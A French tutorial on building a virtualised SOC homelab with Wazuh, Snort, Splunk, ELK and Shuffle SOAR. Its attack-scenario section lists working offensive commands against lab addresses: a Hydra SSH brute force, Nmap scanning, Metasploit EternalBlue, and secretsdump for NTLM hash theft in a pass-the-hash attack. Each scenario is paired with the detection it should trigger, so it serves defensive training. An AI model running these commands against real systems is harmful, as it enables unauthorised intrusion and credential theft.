SOC Homelab : Centre Opérationnel de Sécurité Virtualisé

Introduction

Un SOC (Security Operations Center) est le cœur de la défense cybersécurité d'une organisation. Il centralise la surveillance, la détection et la réponse aux incidents de sécurité. Dans ce projet, nous allons construire un SOC complet et fonctionnel entièrement virtualisé — reproductible sur n'importe quelle machine avec 16 Go de RAM et un processeur récent.

Ce lab est idéal pour un projet de fin d'études (PFE) en cybersécurité, pour préparer une certification SOC Analyst, ou simplement pour comprendre comment les entreprises surveillent leur infrastructure.

💡 Prérequis : Notions de base en réseaux (OSI, IP, TCP/IP), Linux CLI de base, VMware ou VirtualBox installé. 16 Go RAM minimum, 100 Go d'espace disque libre.

Architecture du lab

Notre SOC Homelab est composé de plusieurs couches : une couche réseau avec firewall, une couche collecte des logs, une couche analyse SIEM et une couche automatisation SOAR. Voici les composants principaux :

FortiGate NGFW — Pare-feu de nouvelle génération, point d'entrée du réseau
pfSense + Snort — Firewall secondaire avec IDS/IPS Snort intégré
Wazuh SIEM — Collecte et corrélation des logs, détection d'intrusion
Splunk Enterprise — Analyse avancée des données de sécurité
ELK Stack (Elasticsearch + Logstash + Kibana) — Stockage et visualisation
Shuffle SOAR — Automatisation de la réponse aux incidents
Active Directory — Annuaire Windows, cible des scénarios d'attaque

Topologie réseau

Le lab est organisé en 4 segments réseau isolés par des VLANs :

VLAN 10 — Management (10.0.10.0/24) : FortiGate, pfSense, serveurs SOC
VLAN 20 — Production (10.0.20.0/24) : Active Directory, serveurs Windows
VLAN 30 — Attaquant (10.0.30.0/24) : Kali Linux, machines offensives
VLAN 99 — DMZ (10.0.99.0/24) : Services exposés vers l'extérieur

Installation des composants

1. Installation FortiGate VM

Télécharge l'image d'évaluation FortiGate depuis le portail Fortinet. L'image d'évaluation est gratuite et fonctionnelle 15 jours, ce qui est largement suffisant pour un lab.

# Après import dans VMware :
# Interface WAN : bridged (accès internet)
# Interface LAN : host-only ou réseau interne GNS3
# Accès WebUI : https://192.168.1.99
# Login par défaut : admin / (vide)

Configure les interfaces dans FortiOS :

config system interface
  edit "port1"
    set mode static
    set ip 10.0.10.1 255.255.255.0
    set allowaccess ping https ssh
  next
end

2. Installation Wazuh SIEM

Wazuh est la solution SIEM open source la plus utilisée pour les labs. Installe-le sur Ubuntu Server 22.04 :

# Installation rapide Wazuh (all-in-one)
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a

# Accès dashboard : https://[IP]:443
# Les credentials sont affichés à la fin de l'installation

Une fois installé, déploie les agents Wazuh sur chaque machine à surveiller :

# Sur chaque machine Linux à surveiller :
curl -so wazuh-agent.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.7.0-1_amd64.deb
sudo dpkg -i wazuh-agent.deb
sudo WAZUH_MANAGER='10.0.10.50' systemctl start wazuh-agent

3. Installation Shuffle SOAR

Shuffle automatise la réponse aux incidents via des workflows. Installation via Docker :

git clone https://github.com/Shuffle/Shuffle
cd Shuffle
docker compose up -d

# Accès : http://[IP]:3001
# Créer un compte admin à la première connexion

Scénarios d'attaque simulés

Ce lab permet de simuler 4 scénarios d'attaque réels et d'observer comment le SOC les détecte :

Scénario 1 — Brute Force SSH

Depuis Kali Linux, lance une attaque brute force sur le serveur SSH :

# Attaque brute force avec Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.0.20.10

# Wazuh détecte automatiquement via la règle 5763 :
# "sshd: authentication failure"
# Alerte générée dans le dashboard Wazuh

Scénario 2 — Scan Nmap

Un scan agressif Nmap déclenche des alertes dans Snort et Wazuh :

nmap -A -T4 -p- 10.0.20.0/24
# Snort détecte le scan et génère des alertes IDS
# FortiGate bloque l'IP source après seuil configurable

Scénario 3 — Exploitation Metasploit

Simulation d'une exploitation sur une machine vulnérable :

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.20.20
set LHOST 10.0.30.10
run
# Wazuh détecte le trafic SMB anormal via Snort

Scénario 4 — Pass-the-Hash Active Directory

Attaque latérale sur l'Active Directory avec récupération du hash NTLM :

python3 secretsdump.py administrator:Password1@10.0.20.5
# Récupération des hashes NTLM
# Tentative d'authentification avec le hash
# Wazuh + Splunk génèrent des alertes critiques

Configuration des dashboards

Pour chaque outil, configure des dashboards adaptés à la surveillance en temps réel :

Wazuh : Tableau de bord "Security Events" → filtrer par règle level > 10
Kibana : Créer un index pattern wazuh-alerts-* puis importer les visualisations
Splunk : Installer l'app "Security Essentials" depuis Splunkbase

⚠️ Légalité : Ces scénarios d'attaque ne doivent être exécutés que dans ce lab isolé. Toute attaque sur des systèmes réels sans autorisation écrite est illégale (Loi camerounaise n°2010/012).

Conclusion

Ce SOC Homelab couvre l'ensemble de la chaîne opérationnelle de sécurité : de la détection réseau (Snort, FortiGate) à la corrélation SIEM (Wazuh, Splunk) en passant par la réponse automatisée (Shuffle SOAR). C'est un projet idéal pour un PFE car il est reproductible, documentable et démontre des compétences concrètes recherchées par les entreprises.

SOC Homelab : Concevoir un Centre Opérationnel de Sécurité en Environnement Virtualisé